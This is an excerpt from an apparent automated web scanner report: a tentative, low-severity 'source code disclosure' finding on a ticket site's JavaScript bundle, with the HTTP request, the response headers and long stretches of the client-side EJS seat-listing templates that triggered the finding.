<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': \'NA\', \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="new-seat-row" onmouseover="SeatsPageController.highlightSet(\'<%= ticketId %>\',true);" onmouseout="SeatsPageController.highlightSet(\'<%= ticketId %>\',false);">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/soldpricebox.ejs\').render({\'price\': price})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= SeatsPageController.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': true})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': \'NA\', \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'row_only\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'comparableKey\': comparableKey, \'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': saved})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'none\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %> <%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section! \n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to(" ", \'/reviews_photos_intro\', {target: \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="seat-view-link-rt">\n\
<%= link_to(\'Zoom into map\',"javascript:void(0)", {\'class\': \'zoom-to-map\'}) %>\n\
</div>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %> <%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section! \n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to(" ", \'/reviews_photos_intro\', {\'target\': \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>
...[SNIP]...

16.5. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: Z9FoeWr+ih96b6lf6CpPuGI5Q+iohS1B0OD9/xoR6URU8iUBbVK0gBV5FOOmbIfK
x-amz-request-id: EC2B59ADFAB49C95
Date: Tue, 12 Jul 2011 18:04:47 GMT
x-amz-meta-group: 0
x-amz-meta-owner: 0
x-amz-meta-permissions: 33204
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:39:51 GMT
Last-Modified: Tue, 12 Jul 2011 06:42:23 GMT
ETag: "40bbfaa121237bb7aa5b8c6dcdbdee4f"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 157752
Server: AmazonS3
Age: 606636
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 94d0c3f8dc004c8cda6bc23e7dceb0ef72103b97c12bed047428c7580127f59693327d74dd815b2a
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function($){var topics={};$.fn.publish=function(topic,args,sync){if(typeof topics[topic]=="undefined"){return this;}
var args=args||[],argsLength=args.length,t=topics[topic],l=t.length,that=this,publ
...[SNIP]...
each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name]);});};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id;};_.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};_.template=function(str,data){var c=_.templateSettings;var tmpl='var __p=[],print=function(){__p.push.apply(__p,arguments);};'+'with(obj||{}){__p.push(\''+
str.replace(/\\/g,'\\\\').replace(/'/g,"\
...[SNIP]...
ame:userName,userXid:user.get("userXid"),venueName:venueName};var name=eventName;if(opts.nameTemplate){name=this._renderTemplate(opts.nameTemplate,context);}
var captionTemplate=opts.captionTemplate||"<%= eventDate %> in <%= eventCity %>.";var caption=this._renderTemplate(captionTemplate,context);var hash=opts.hash;if(opts.hashTemplate){hash=this._renderTemplate(opts.hashTemplate,context);}
var params={method:'feed',name:name,caption:
...[SNIP]...
entifyingData:function(){var idString=this.uid+'|'+this.style+'|'+this.channel+'|'+this.ctx;return idString;}};if(typeof preCompiledEJSTemplates=='undefined'){var preCompiledEJSTemplates={};}
var str='<% var broker_ids = [];\n\
for(broker_id in brokers) {\n\
broker_ids[brokers[broker_id][\'sort_order\']] = broker_id;\n\
};\n\
%>\n\
<div id="broker_filter" class="in-map-filter-holder">
...[SNIP]...
<h2>Providers (<%= num_brokers %>)</h2>
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < broker_ids.length; i++) { %>\n\
<li class="in-map-filter-<%= logos_enabled ? "bg" : "no" %>-img">
...[SNIP]...
<div class="in-map-filter-labels">\n\
<% if(logos_enabled) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-\'+ broker_ids[i] +\'.gif\'), broker_id +\'_id\') %>\n\
<% } %>
...[SNIP]...
<label for="<%= broker_ids[i] %>_id">\n\
<%= brokers[broker_ids[i]]["name"] %> (<strong><%= brokers[broker_ids[i]]["seat_count"] %></strong>)\n\
<% if (channel.forceParam) {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details?ch=\' + channel.code;\n\
}\n\
else {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details\';\n\
}\n\
%>\n\
[<a href=\'<%= link %>\' onclick=\'broker_popup(this.href); return false;\'>
...[SNIP]...
<input type="checkbox" class="flt_brk" name="brks[]" id="<%= broker_ids[i] %>_id" value="<%= broker_ids[i] %>" <%= brokers[broker_ids[i]][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>
...[SNIP]...
<div id="locationList">\n\
<%= lookupEjsTemplate(\'seats_page/location_filter_inner.ejs\').render({\'facets\': facets, \'outer_class_name\': "flt_area", \'outer_input_name\': \'areas[]\', \'child_class_name\': \'flt_sec\', \'child_input_name\': \'secs[]\'})%>\n\
<div class="in-map-select">
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < facets.length; i++) { %>\n\
<li class="static-list-ele">
...[SNIP]...
<input type="checkbox" id="areas[]-<%= facets[i].id%>" name="areas[]" value="<%= facets[i].id%>" class="<%= outer_class_name %>" <%=facets[i][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>\n\
<label class="static-list-label"><%= facets[i].name %></label>\n\
<% if (facets[i].children) { %>\n\
<span class=\'expandable\'>
...[SNIP]...
<ul class="mSecList" >\n\
<% for(var j=0; j < facets[i].children.length; j++) { %>\n\
<li class="mSecListItems">
...[SNIP]...
<input type="checkbox" class="<%= child_class_name %>" name="secs[]" value="<%= facets[i].children[j].id %>" <%=facets[i].children[j][\'start_checked\'] ? \' checked="checked"\' : \'\' %> />
...[SNIP]...
<label> <%= facets[i].children[j].name %> </label>
...[SNIP]...
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel_inner.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
</div>
...[SNIP]...
<div class="providerNotes">\n\
<%= notes %>\n\
</div>
...[SNIP]...
<tbody>\n\
<% var eTickets = false, eTicket, i; %>\n\
<% for (i = 0; i < deals.length; i++) { %>\n\
<%\n\
if (eTicketsUI && deals[i].delivery && deals[i].delivery[0] == \'do_et\') {\n\
eTicket = true;\n\
eTickets = true;\n\
} else {\n\
eTicket = false;\n\
}\n\
%>\n\
<tr class="providerRow <%= (i != deals.length - 1) ? \'notlast\' : \'\'%>">
...[SNIP]...
<td class="providerName<%= eTicket ? \' e-ticket\' : \'\' %>"><%= deals[i].broker %></td>
...[SNIP]...
<td class="salePrice<%= FS.config.view.props.highlightBasePrice ? \' boldPrice\' : \'\' %>"><%= float_to_currency(deals[i].salePrice, 2) %></td>
...[SNIP]...
<td class="handlingFee"><%= float_to_currency(deals[i].handlingFee, 2) %></td>
...[SNIP]...
<td class="totalPrice<%= FS.config.view.props.highlightBasePrice ? \'\' : \' boldPrice\' %>"><%= float_to_currency(deals[i].salePrice + deals[i].handlingFee, 2) %></td>
...[SNIP]...
<div class="blueButton_small" data-ticketSetId="<%= deals[i].id %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=<%= i + 1 %>;dt=<%= totalDeals %>;lpos=<%= listPosition %>" data-dealPosition="<%= i %>"><%= goButtonText %></div>
...[SNIP]...
<div class="additionalNotes">\n\
<% if (eTickets) { %>\n\
<div><%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket" } ) %> eTicket</div>
...[SNIP]...
<div class="providerFeesNote"><%= detailPanelNote %></div>
...[SNIP]...
</span>\n\
<% if (sharingEnabled) { %>\n\
<span class ="panelLink shareLink">
...[SNIP]...
<% } %>\n\
<% if (shortListEnabled) { %>\n\
<% if (saved) {\n\
var text = \'Saved\';\n\
var savedCss = " savedOffer";\n\
} else {\n\
var text = \'Save\';\n\
var savedCss = "";\n\
} %>\n\
<span class ="panelLink saveLink<%= savedCss %>"><a href="javascript:void(0)"><%= text %></a>
...[SNIP]...
<div class="seatprice" data-ticketSetId="<%= ticketId %>" data-ctx="c=<%= srcCtx %>;mt=<%= mapType %>;tsp=0;dt=<%= totalDeals %>;lpos=<%= listPosition %>">\n\
<div class="<%= TicketListFormattingHelpers.choosePriceClass(price) %>">
...[SNIP]...
<span class="price"><%= TicketListFormattingHelpers.addCommas(price) %></span>
...[SNIP]...
<div class="select-btn-<%= goButtonClass %> new-go-button"><%= goButtonText %></div>\n\
<% if (FS.config.view.props.highlightBasePrice) { %>\n\
<div class="total-with-fee">$<%= TicketListFormattingHelpers.addCommas(Math.ceil(totalPrice)) %> with<br/> <%= broker.length > 13 ? \'seller\' : broker %> fees</div>
...[SNIP]...
<div id="<%= listPosition %><%= domIdModifier %>-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText, \'hoverAction\': true})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.props.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="tixLogo">\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-compact-\'+brokerId+\'.gif\'), \'broker logo\') %>\n\
</div>
...[SNIP]...
<div class="best-value-<%= bvTag %>">
...[SNIP]...
<strong>\n\
<% if ((typeof row_style === \'undefined\') || row_style == \'both\') { %>\n\
<span class="ticket-section"><%= section %></span>
...[SNIP]...
<span>Row <%= row %></span>\n\
<% } else if (row_style == \'row_only\') { %>\n\
<span class="row-only-view" >Row: <%= row %></span>
...[SNIP]...
<span class="series-date"><%= dateTime %></span>\n\
<div class="handling">\n\
<%= splitsText %>\n\
<% if (eTicketsUI && hasETicket) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/e-ticket.png\'), \'eTicket\', { "Class": "e-ticket", "title": "eTicket" } ) %>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'row_only\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'row_style\': \'none\', \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div id="<%= listPosition %>-mrk-ticket-listing" class="new-seat-row-wrapper">
...[SNIP]...
<div class="new-seat-row<%= oddRow ? " odd-ticket" : "" %>">\n\
<div class="offerUpper">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
